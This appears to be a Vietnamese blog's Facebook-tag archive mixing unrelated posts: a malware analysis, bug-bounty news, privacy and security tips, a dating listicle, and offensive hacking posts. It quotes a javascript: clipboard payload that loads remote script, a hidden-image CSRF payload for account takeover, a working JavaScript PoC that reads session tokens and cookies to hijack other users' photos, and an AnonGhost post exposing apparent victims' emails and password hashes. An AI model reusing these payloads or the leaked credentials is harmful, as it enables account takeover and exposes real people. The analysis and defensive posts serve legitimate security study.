Đang tải dữ liệu...
Hiển thị các bài đăng có nhãn facebook. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn facebook. Hiển thị tất cả bài đăng
19:54

Facebook malware on the rise

Today, many Italian users found on their Facebook profiles some links similar to the one depicted below. For non-Italian speakers, the text can be translated as "Facebook security check. To see the video, follow these steps".


When the "Continue" button is pressed, the following form is displayed:


Here is the translation:
  1. Select the address bar
  2. Press 'j' on the keyboard
  3. Press (CTRL+V) and press ENTER
What happens under the hood is quite simple, and similar to other Facebook malware. The link posted on the victim's Facebook profile refers to a malicious SWF file (hxxp://www.cowboysaliensstreaming.com/tag/test.swf) which displays the two dialogs depicted above. Once executed, the applet also fills the clipboard with the text:

avascript:(a=(b=document).createElement(\'script\')).src=\'hxxp://www.cowboysaliensstreaming.com/tag/fb.php\',b.body.appendChild(a);void(0)

Then, the SWF asks the user to click on the address bar, press 'j' and then CTRL+V. The result is that the following text is copied in the address bar:

javascript:(a=(b=document).createElement(\'script\')).src=\'hxxp://www.cowboysaliensstreaming.com/tag/fb.php\',b.body.appendChild(a);void(0)

As a consequence, a piece of Javascript code is executed that can interact with the Facebook DOM document. The Javascript code fragment creates a new HTML <script> element which loads the resource stored at hxxp://www.cowboysaliensstreaming.com/tag/fb.php. The malicious resource spreads the malware to the Facebook friends of the victim, and eventually displays some spam links:


For those who are interested, a copy of the malicious Javascript code can be found here.

So nothing is really new with this sample: the same techniques have already been used several times in the past. What is astonishing is the number of victims: despite Internet users should be now familiar with these trivial threats, there have been more and more (mostly Italian) Facebook users who carefully followed the instructions of the malware, without even thinking about why they should ever copy a strange string in the address bar to see a YouTube video.
16:57

9 lý do nên yêu trai CNTT (IT)

Các chàng chuyên viên vi tính (IT) thường rất chung tình. Có bao giờ bạn để ý thấy một anh chàng "ngồi đồng" bên chiếc máy tính cả ngày, hầu như không ra khỏi phòng? Đó đích thị là những "con rệp điện tử", yêu máy tính và điện thoại của mình vô cùng. Trong tư tưởng của một số bạn gái, đây là mẫu người yêu vô cùng lý tưởng.




1. Chàng IT thường không có tính "ong bướm"

Các chuyên viên vi tính cảm thấy rất hứng thú với máy tính, điện thoại của họ hoặc các trang web công nghệ cao. Bởi đó là niềm đam mê lớn nhất của họ. Họ không bao giờ điều tra hoặc nhìn cô gái đẹp ngay cả khi cô ta đi ngang qua. Họ muốn biết về các tiện ích mới nhất trong thị trấn hơn là các cô gái sành điệu nhất. Vì thế khi yêu chàng IT, các bạn gái không cần lo lắng các chuyên viên vi tính lăng nhăng bên ngoài.

2. Họ là những "vị cứu tinh" của công nghệ
Chỉ cần tưởng tượng đêm nay chiếc máy tính xách tay của bạn tự động tắt nguồn, trong khi sáng mai bạn phải có một bài thuyết vô cùng quan trọng tại trường hoặc công ty. Bạn sẽ nhờ ai đây? Tất nhiên vào ban đêm thì chẳng có trung tâm sửa chữa máy tính nào làm việc cả. Vì vậy, nếu bạn có một người bạn trai chuyên về tin học, anh sẽ là người duy nhất đến cứu bạn. Không những thế anh ta còn giúp được bạn trong trường hợp các thiết bị điện tử bị hỏng hóc đấy.

3. Họ rất thông minh
Thật tự hào khi có một người bạn trai thông minh phải không nào? Anh chàng IT có thể hiểu được nguyên lý vận hành của cả cỗ máy khổng lồ hay những vi mạch li ti cứ như thể nó do anh ta sản xuất ra vậy. Tình yêu của bạn gái đôi khi xuất phát từ chính sự ngưỡng mộ đối với trí thông minh của các chàng trai này. Sự thông minh ấy có thể sẽ cứu bạn khỏi những tình huống khó khăn.

4. Họ không đòi hỏi quá nhiều
Chuyên viên vi tính có một phẩm chất mà các bạn nữ yêu thích. Họ hài lòng với những tiện ích của mình hơn là chê bạn mặc bộ quần áo không đẹp. Nếu bạn gái đẹp và giản đơn, có lẽ họ sẽ đánh giá cao về bạn. Nhưng thỉnh thoảng bạn cột một kiểu tóc xấu thì bạn chẳng cần quá lo lắng bởi anh chàng IT sẽ không nổi cáu về điều này đâu. Thay vào đó, họ có thể say sưa hỏi về chiếc điện thoại mà bạn mới mua hoặc có thể chỉ cho bạn cách sử dụng nó như thế nào.

5. Họ kiên trì và có nhiều sáng kiến
Các chuyên viên IT sẽ không chịu bó tay trước một "căn bệnh" nào của chiếc máy tính mà họ sở hữu hoặc sửa giúp ai đó. Họ luôn nghĩ hết cách này đến cách khác để khắc phục sự cố. Tất nhiên cho đến khi nào họ "bó tay" thì thiết bị đó đã thực sự tê liệt. Lúc này họ mới chịu đưa đi bảo hành. Nhưng dù sao anh ta vẫn ghi điểm trong mắt bạn gái về tính kiên trì.

6. Họ có nhiều bạn tốt
Những chuyên viên máy tính sẽ kết bạn với những người có cùng tư tưởng với họ, đó là những anh chàng IT khác. Tất nhiên người tốt thì thường chơi với bạn tốt. Thế nên hầu hết những người bạn của anh ta cũng khá "lành tính".

7. Họ luôn chăm sóc bạn
Không phải các anh chàng này chỉ biết mỗi vi tính đâu nhé. Tất nhiên họ cũng buồn khi nhìn thấy người khác có cặp có đôi còn mình vẫn đơn độc. Vấn đề là anh ta do quá mê mẩn với thế giới công nghệ nên không "cập nhật" được những chiêu tán tỉnh con gái như thế nào. Vì thế chỉ cần có một cô gái nào đó tự nguyện bước vào cuộc đời anh ta thì anh thật sự rất hạnh phúc khi có bạn bên cạnh. Chàng sẽ chăm sóc bạn một cách tối đa từ những nhu cầu nhỏ nhặt nhất.

8. Họ ghi nhớ tất cả những ngày đặc biệt
Đây là một tố chất của anh chàng IT được các bạn gái rất yêu quý và tôn trọng. Không như những chàng trai trẻ sành điệu, những người chỉ thích nói chuyện tầm phào, còn các chuyên viên IT thực sự có thể nhớ tất cả những ngày kỷ niệm đặc biệt với bạn. Ví dụ: thời điểm lần đầu tiên hai người gặp nhau, nụ hôn đầu, ngày hẹn hò đầu, ngày nắm tay lần đầu tiên và nhiều thứ khác. Có thể bạn sẽ quên một vài ngày và họ sẽ là người nhắc bạn.

9. Họ là người cực kỳ lãng mạn
Bạn thử tưởng tượng một tên miền trên mạng được anh ta đặt ra mang tên bạn. Điều đó mới thú vị làm sao. Anh ta có thể không thường xuyên tặng hoa cho bạn gái nhưng nhưng sẽ thiết kế cả một diễn đàn cho bạn, của bạn, vì bạn. Nếu họ là những chuyên viên máy tính thật sự và sau đó họ có thể tạo ra một vài ứng dụng của iPhone căn cứ vào chính những đặc điểm của bạn để bạn tha hồ "phiêu" trong thế giới công nghệ ấy.

Theo Thi Trân (VnExpress.Net)
11:18

Vulnerability allowed hacker to Delete any Facebook Photo; Rewarded with $12,500 for reporting bug - The Hacker News






Indian Security Enthusiast Arul Kumar recently reported an interesting Facebook vulnerability that allowed him to delete any Facebook&nbsp;image within a minute.
Facebook Bug Bounty program rewarded him with&nbsp;&nbsp;$12,500 USD for helping the Facebook Security team to patch this critical loophole in their own Support Dashboard
The flaw is critical because using this exploitation method hacker can also delete Mark Zuckerberg's Facebook Founder Photos from his Photo Album, or even from wall of any verified page too.


Arul posted on his blog, "The Support Dashboard is a portal designed to help you track the progress of the reports you make to Facebook. From your Support Dashboard, you can see if your report has been reviewed by Facebook employees who assess reports 24 hours a day, seven days a week"

That means, if you will report abuse the targeted image and send a Photo Removal Request, Facebook Server Will automatically generates Photo removal Link and send to the Owner. If the Owner of that image clicks that link, Photo will be removed.






Hacker explained that two parameters i.e Photo_id Owners <b>Profile_id </b>are vulnerable&nbsp;and if hacker will change modifies the values of these parameters&nbsp;using Inspect Element feature of Google Chrome, then the hacker is able to receive that photo removal link to his own Inbox of another account,&nbsp;rather than sending to the owner's Inbox.








This way trick involves just two attackers Facebook account, no victim's interaction&nbsp;and hackers were able to&nbsp;delete any Shared-Tagged photos, Photo from Status Photo album, Pages, Groups and also from Comments.

Recently Khalil, a Palestinian white hat hacker, Hacked into Zuck's WallAfter Facebook Ignored His Bug Report


Tạm dịch là :

Một người ấn độ.Arul Kumar gần đây báo cáo một lỗ hổng Facebook thú vị mà cho phép ông để xóa các hình ảnh Facebook trong vòng một phút. Facebook chương trình Bug Bounty thưởng anh ta với $ 12,500 USD để giúp các đội an ninh Facebook để vá lỗ hổng quan trọng này trong Bảng điều khiển hỗ trợ của mình Lỗ hổng này là rất quan trọng bởi vì sử dụng phương pháp này khai thác của hacker cũng có thể xóa Facebook sáng lập Mark Zuckerberg Hình ảnh từ album ảnh của mình, hoặc thậm chí từ bức tường của bất kỳ trang nào xác minh quá.   Arul đăng trên blog của mình, "Bảng hỗ trợ là một cổng thông tin được thiết kế để giúp bạn theo dõi sự tiến bộ của báo cáo bạn thực hiện cho Facebook. Từ Bảng điều khiển của bạn hỗ trợ, bạn có thể xem báo cáo của bạn đã được xem xét bởi các nhân viên của Facebook hiện đánh giá báo cáo 24 giờ một ngày, bảy ngày một tuần"   Điều đó có nghĩa, nếu bạn sẽ báo cáo lạm dụng hình ảnh mục tiêu và gửi một hình ảnh yêu cầu diệt, Facebook Server sẽ tự động tạo ra hình ảnh loại bỏ liên kết và gửi cho chủ sở hữu. Nếu chủ sở hữu của hình ảnh đó nhấp chuột liên kết, hình ảnh sẽ được gỡ bỏ.


Nguồn : TheHackerNews
19:24

Làm thế nào để hoàn toàn “vô hình” trên Facebook?

Bằng một số bước chỉnh sửa quyền riêng tư cơ bản, người dùng Facebook sẽ thoát khỏi cảnh bị làm phiền bởi những người không mong muốn.
Một số người dùng Facebook không thích phải nhận những lời yêu cầu kết bạn từ người lạ hay tin nhắn từ người quen lâu ngày không gặp. Nhiều người chỉ đơn giản dùng Facebook để liên lạc, song không muốn người khác biết gì về mình.
Làm thế nào để hoàn toàn “vô hình” trên Facebook?
Nếu muốn “ẩn thân” hoàn toàn trên Facebook, bạn có thể thực hiện theo các bước dưới đây. Sau khi hoàn tất, không có ai ngoài bạn có thể xem mọi hoạt động trên Facebook, xem ảnh, ghi chú của bạn. Bạn bè trên Facebook chỉ nhìn thấy trang cá nhân với thông tin cơ bản còn hoạt động của bạn trống rỗng.
Để bắt đầu, click chuột vào biểu tượng bánh xe ở góc trên cùng bên phải màn hình, chọn Privacy Settings.
Làm thế nào để hoàn toàn “vô hình” trên Facebook?
Để thay đổi quyền riêng tư, bạn luôn phải click vào nút “edit” (chỉnh sửa) nằm bên phải mỗi cài đặt. Sau khi thực hiện xong thay đổi, click vào nút “close” (đóng).
Làm thế nào để hoàn toàn “vô hình” trên Facebook?
Cách đơn giản nhất để che giấu thân phận là ở mục “Who can see my stuff” (ai có thể xem hoạt động của tôi), từ trình đơn sổ xuống lựa chọn “Only me” (chỉ mình tôi). Các bài đăng trong tương lai của bạn sẽ không bị ai nhìn thấy.
Làm thế nào để hoàn toàn “vô hình” trên Facebook?
Tiếp theo, bạn có thể chặn yêu cầu kết bạn từ người lạ bằng cách thay đổi cài đặt “Who can send you friend request” (ai có thể gửi yêu cầu kết bạn) sang “Friends of Friends” (bạn của bạn). Như vậy, chỉ những ai là bạn bè của người quen của bạn mới có thể gửi yêu cầu kết bạn.
Làm thế nào để hoàn toàn “vô hình” trên Facebook?
Bạn còn có thể giới hạn đối tượng nào gửi được tin nhắn Facebook cho mình. Lựa chọn “Strict Filtering” để tránh xa khỏi các tin nhắn không mong đợi.
Làm thế nào để hoàn toàn “vô hình” trên Facebook?
Để mọi người không thể tìm kiếm bạn qua số điện thoại hay email đăng ký Facebook, chọn “Friends” trong mục cài đặt “Who can look me up” (ai có thể tìm kiếm tôi).
Làm thế nào để hoàn toàn “vô hình” trên Facebook?
Bước tiếp theo rất quan trọng. Phần lớn mọi người chỉ cần dùng Google hay công cụ tìm kiếm khác để tìm tài khoản Facebook của bạn. Trong mục cài đặt “Do you want to other search engines to link to your Timeline” (bạn có muốn các máy tìm kiếm khác liên kết tới Timeline), bỏ chọn ô “Let other search engines link to your timeline”.
Làm thế nào để hoàn toàn “vô hình” trên Facebook?
Sau khi đã hoàn tất ở mục cài đặt quyền riêng tư, hãy chuyển sang mục “Timeline and tagging”. Mục này nằm ngay dưới “Privacy Settings” ở bên trái màn hình.
Làm thế nào để hoàn toàn “vô hình” trên Facebook?
Bạn sử dụng cùng kỹ thuật kể trên trong mục này. Click vào “edit” để chỉnh sửa rồi click vào “close” sau khi hoàn tất. Hãy nhớ, chọn “Only Me” bất cứ khi nào có thể. Nếu không có tùy chọn này, “Friends” là lựa chọn tốt thứ hai.
Làm thế nào để hoàn toàn “vô hình” trên Facebook?
Lặp lại các bước ở trên, kết quả cuối cùng của trang cài đặt sẽ giống như hình dưới. Tiếp theo, “tấn công” mục“Apps” (ứng dụng) bên dưới “Timeline and tagging”.
Làm thế nào để hoàn toàn “vô hình” trên Facebook?
Để vô hiệu hóa “App Platform”, buộc ứng dụng không thể truy cập vào thông tin cá nhân của bạn, chỉ cần click vào “Edit” và tắt nó đi.
Làm thế nào để hoàn toàn “vô hình” trên Facebook?
Sau khi tắt, chuyển qua mục “Adverts” dưới mục “Apps”.
Làm thế nào để hoàn toàn “vô hình” trên Facebook?
Bắt đầu chỉnh sửa bằng cách nhấn vào nút “edit” bên cạnh mỗi cài đặt.
Làm thế nào để hoàn toàn “vô hình” trên Facebook?
Thay đổi mục “Third Party Sites” (các trang thứ ba) sang “No one” (không ai) để đảm bảo tên hoặc ảnh đại diện của bạn không xuất hiện trong quảng cáo của các trang khác. Chuyển “Adverts and Friends” sang “No one” để ngăn chặn Facebook gửi gợi ý tới bạn bè của bạn dựa trên những gì bạn đã “like” (thích).
Làm thế nào để hoàn toàn “vô hình” trên Facebook?
18:53

Vulnerability allows Hacking Facebook account within a minut


Vulnerability
Security expert Dan Melamed discovered a critical Facebook vulnerability would allow an attacker to take complete control over any account.
Facebook security team confirms it’s been patched.
A critical Facebook vulnerability would allow an attacker to take complete control over any account, the discovery was made by Dan Melamed, a security researcher, web developer, self-employed internet marketer, and entrepreneur.
Dan was recently featured on Facebook’s Whitehat page, the researcher revealed that if the victim is logged into Facebook, to conduct that attack it is enough to induce him to visit a website link that once loaded allows the attacker to reset the victim’s password.
The Facebook vulnerability is related the “claim email address” component of the popular social network.
If a user tries to add an email address already known to the Facebook platform, he has the option to “claim it”.
The Facebook vulnerability is the leak of the check of the account that make the claim request allowing an email to be claimed by any Facebook account.
The attack technique has the following pre-requirements
  • An existing account having the email address that the attacker wants to claim.
  • Another existing account to initiate the claim process.
When user makes a claim request for an @hotmail.com email he is taken to a link that appears like this:
The researcher found that the parameter appdata[fbid] was the encrypted email address. For the proof of concept the encrypted email used was “funnyluv196@hotmail.com”. The link will redirect user to the sign in page for Hotmail.
“You must sign in with the email address that matches the encrypted parameter. Once signed in, you are taken  to a final link that looks like this:
https://www.facebook.com/support/openid/accept_hotmail.php?appdata=%7B%22fbid%22%3A%22AQ3Tcly2XEfbzuCqyhZXfb8_hYHTnHPPd-CDsvdrLzDnWLpsKTMcaXtIzV0qywEwbPs%22%7D&code=a6893043-cf19-942b-c686-1aadb8b21026 ”

Analyzing the source code it’s possible to note that the claim email process has succeeded:
 <script type="text/javascript">window.opener.location.href = "\/claim_email\/add_email\/check_code?email=funnyluv196\u002540hotmail.com&openid=1"; window.close();</script>
Dan Melamed remarked two important aspects on the exploit of Facebook vulnerability:
- The link expires in around 3 hours, giving plenty of time for a hacker to use it.
- It can be visited on any Facebook account because there is no check to see who made this request.
To trick the victim the hacker has just to insert the following link on a webpage as either an image or an iframe

Example:
<img src=”https://www.facebook.com/support/openid/accept_hotmail.php?appdata=%7B%22fbid%22%3A%22AQ3Tcly2XEfbzuCqyhZXfb8_hYHTnHPPd-CDsvdrLzDnWLpsKTMcaXtIzV0qywEwbPs%22%7D&code=a6893043-cf19-942b-c686-1aadb8b21026″ width=”0″ height=”0″/>
Inducing the victim click on it sending to the victim a link (http://evilsite.com/evilpage.html)
“Once clicked, the email (in this case: funnyluv196@hotmail.com) is instantly added to their Facebook account. The victim does not receive any notification whatsoever that this email has been added. The hacker can then reset the victim’s password using the newly added email address. Thus allowing the attacker to take complete control over the Facebook account.”
This vulnerability has been confirmed to be patched by the Facebook Security Team, fortunately the group is very responsive as demonstrated for the fix of other recent flaws. It must be considered that the popular social networking platform is very attractive for cybercrime and many other categories of attackers, cyber security is a critical aspect for its business success.
Pierluigi Paganini

18:48

How To Get FaceBook Status/Photo/Video ID-Codes Online?

How-To-Get-FaceBook-Status-Photo-Video-ID-Codes-Online

After discussing FaceBook Profile/Page ID-Code, here we will discuss about How To Get FaceBook Status/Photo/Video ID-Codes. In many Autoliker or Facebook apps codes, you have to need this code so here we will teach you how to get the ID. When posting a facebook post on facebook automatically assign a code to that post as for profile and page.

There is also a min requirement to get these ID Codes work on third party sites that your that post should be public. So here we have the tutorial about it. There are two methods to get your desired post id codes that we will discuss both of them below in details.


Method 1:

In method 1, you can get your post id with some following some steps.
1.) Go To Your Facebook Timeline.
2.) Select Your Desired Facebook Status/Photos/Videos/Feeds.
3.) Right Click (Right Click And Open In New Tab) On Time And Day, Anything In Gray Colour Just Below Your Name As In The Blue Boxes Of The Below ScreenShoot.

How-To-Get-ID-Of-Status-Photos-Videos-Feeds

4.) Now After Clicking On The Upper Described Link, You Will Be Redirected To A Page Where You Will See Some URL In Address Bar As Below...
+) https://www.facebook.com/EXEIdeas/posts/483137505091263
+) https://www.facebook.com/photo.php?fbid=402892739782407&set=a.101241583280859.2029.100001850525177&
amp;type=1&source=11

5.) Now Just Copy The Red Numbers As Mentioned In The Above URLs. (Still Not Able To Get ID Code, Then See The Next Tutorial Below)

Method 2:

In method 2, you can get your post id with following some steps.
1.) Go To Your Facebook Timeline.
2.) Select Your Desired Facebook Status/Photos/Videos/Feeds And Move To Post Footer.
3.) Right Click (Right Click And Open In New Tab) On ThumbUp With Count Icon As In The Blue Boxes Of The Below ScreenShoot.
Or
3.) Right Click (Right Click And Open In New Tab) On The Words Saying "1 people like this", "2 others" Or Something Else As In The Red Boxes Of The Below ScreenShoot.
Or
3.) Right Click (Right Click And Open In New Tab) On Shared Icon With Count As In The Green Boxes Of The Below ScreenShoot.

How-To-Get-ID-Codes-Of-Status-Photos-Videos-Feeds

4.) Now After Clicking On The Upper Described Link, You Will Be Redirected To A Page Where You Will See Some URL In Address Bar As Below...
+) https://www.facebook.com/browse/likes?id=483137505091263
+) https://www.facebook.com/shares/view?id=520157974722549
5.) Now Just Copy The Red Numbers There. It's Your Desired ID Code.
23:26

Facebook Comment's Picture Hijacking

Today Facebook rollouts for FB users to comment with picture on any status. But the feature has a bug which allows malicious user to hijack the picture from any comments if the picture is share by uploading for comment. 

After Malicious user hijack the picture, malicious person can change picture description as well as delete the picture. 

Let's get started! all you need are status ID and victim's uploaded picture for comment ID. 



Once you have both, we can simply comment on any status with that uploaded picture iD with the help of little javascript or you can use tampa data (attached_photo_fbid) to post with comment picture ID.




-----Javascript Facebook Picture Hijack PoC----

var yourMessage = "check out my pic"; // your msg
var photofbID = XXXXXXXXXX; // victim photo ID
var statuslinkID = XXXXXXXXXX ; //status ID where to comment with hijack

function generatePhstamp(b, g) {
var f = b.length;
numeric_csrf_value = '';
for (var c = 0; c < g.length; c++) {
numeric_csrf_value += g.charCodeAt(c)
}
return '1' + numeric_csrf_value + f
}
var e = document.getElementsByName('fb_dtsg')[0].value,
c = document.cookie.split('c_user=')[1].split(';')[0],
h = "ft_ent_identifier="+statuslinkID+"&comment_text="+yourMessage +"&source=1&client_id=1371674471412:1000847939&attached_photo_fbid="+photofbID+"&rootid=u_ps_0_0_m&ft[tn]=[]&ft[qid]=5891294842807711448&ft[mf_story_key]:-2575904214724011317&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user=" + c + "&__a=1&__dyn=7n8aD5z5CF-&__req=1r&fb_dtsg=" + e;
m = generatePhstamp(h, e);
h += "&phstamp=" + m;
picture = new XMLHttpRequest();
picture.open("POST", "https://www.facebook.com/ajax/ufi/add_comment.php", true);
picture.setRequestHeader("Content-type", "application/x-javascript; charset=utf-8");
picture.send(h);
console.log("The pic has been Hijacked & posted at http://facebook.com/"+statuslinkID);

# C21C8F0A214D3F86 1337day.com [2013-06-22] 69C7CC3775144A2C #

Follow: http://1337day.com/exploit/20915
23:09

How to Protect Facebook Account from Hackers

Every day, we hear that someone Facebook account is hacked? Today we gonna see how to protect Facebook account from hackers. There are several things you can do to protect yourself from being hacked. We will go through each step in detail.


hack+fb+account


Here are some tips to prevent getting hacked:

Use strong passwords
You should not use your phone number,your name, your spouse, parents, siblings or dog, or your birthday as your password. Use a mix of letters, digits and punctuation (but not blank spaces). Use both capital and lowercase letters. The longer your password, the better. The shorter your password, the easier it is to hack, especially if it’s a common word or name. A good starting point is six characters, though 8, 10 or 12 are even better. If you have trouble remembering, do something about that, else consider using an unusual phrase or combo of words that only you or a few people might know, then substitute some of the letters with digits and/or punctuation. Humorous combinations might make it easier to remember, but otherwise write your password down in a SAFE place. Or just keep using the “Forgot password?” option to reset your password.
There are some site that you can use to generate strong password online. One example site is Strong Password Generator.



Change your password regularly
By regularly I mean monthly or even weekly, not yearly. Facebook’s “Forgot password?” option is one way, or you can go to your account’s settings.

Don’t friend everyone
That “hot chick” whom you don’t know and looks like some Hollywood starlet might be a guy. Avoid the person who doesn’t even have a profile pic, let alone any friends in common with you. If you haven’t met them, be cautious. Also, don’t friend friends whom you know to use weak passwords. If their account is compromised, hackers can still learn certain things about you from your profile, or could send you a message via the friend’s account to lure you to a malware site.

Don’t believe all emails
Don’t forget that honest web services will never ask you to do certain things in an email. For example, Facebook will NEVER send you an email asking you to change your password or enter personal details. If they need you to do that, they will tell you where in your account settings you can go to do that. On a similar note, protect your email account that you registered for Facebook with, else someone can succeed in resetting your Facebook password.

Don’t click on Crafted links
Sending link to a victim is a common practice of phishing attack, don't enter password at random site unless you are confirmed, its a facebook login page. Also see the link when you click on a status update that a “friend” posted on your wall and it looks fishy, don’t assume they actually did it. Their account could be compromised. If you're clicking takes you to a Facebook application that you’re unsure of, there’s no obligation to click through.
18:55

Code Auto Like Fans Page. Bấm Đâu Cũng Like

12:56

Exploit Facebook Via External Plugins and Modules

#############################################################
# Title: Exploit Facebook Via External Plugins and Modules  
# Exploitation: Manually (use your brain ^_^)
# Date:  28/03/2013 
# Greetz: Virusa Worm - Man Sykez - BL4ckc0d1n6 and all AnonGhost Memberz
# Author: Mauritania Attacker
#############################################################


For Example my victim is =======>>>  https://www.facebook.com/gaturro22
How i could be able to retrieve his password ? easy
Proof of Concept : Facebook Id ====>>> gaturro22
P0C : ======>>> http://www.poringapic.com/profile.php?id=gaturro22
So as you can see we got the email & the password : 
email: gonza.la22@gmail.com

password: e10adc3949ba59abbe56e057f20f883e

Another Demo : http://www.salondaddy.com/profile.php?ID=85


So when i try the same method with my profile for example : http://www.poringapic.com/profile.php?id=mauritanie.forever

It says "Invalid profile link followed!" loool because i didn't clicked on the Like Button so an advice becareful don't like external pages on websites they are

backdoored with a javascript malware that can sniff all your informations ^_^

So for example the ID "profile.php" is infected with "Code Disclosure Path" as you can see most of websites nowadays they use plugins of facebook on their websites

especially applications , so the facebook user must allow permission to access to the application and most of the plugins are infected !_!

So if you see that a website has the Like Plugin or use a facebook app you can surely get the passwords of the users ^_^ no doubt , just use your brain !

Another Example : http://www.rosexconect.net/profile.php?ID=15370&shPhotosMode=top

Check this :  [NickName] => orso44  ===========>>> add this to www.facebook.com

http://www.facebook.com/orso44   ============>>> Facebook Profile

[Password] => 5c4e79dd006fb00a07945801234d0dd5 ===========>>> Password Hashed in Md5


Another Victim :  ==========>>> https://www.facebook.com/kornberg

Infos Retrieved :

                    [_iProfileID] => 7893
                    [_aProfile] => Array
                        (
                            [datafile] => 1
                            [ID] => 7893
                            [NickName] => Kornberg
                            [Email] => anselmpennell435@yahoo.com
                            [Password] => 087fbfdeb33dae28260cfdb8f2d8a787
                            [Status] => Active
                            {
                            "id": "862420463",
                            "name": "Zoe Kornberg",
                            "first_name": "Zoe",
                            "last_name": "Kornberg",
                            "username": "kornberg",
                            "gender": "female",
                            "locale": "en_US"
                            }

Proof Of Concept : http://hollywoodfilmshoot.com/profile.php?ID=7893&sh_photoMode=rand

I just selected  this user randomly from Facebook and i remarked that she clicked on Like Button and she has been a victim °_° !!!!!!!


demo1
demo2

Like Me On Facebook

Bài Đăng Mới

Quảng Cáo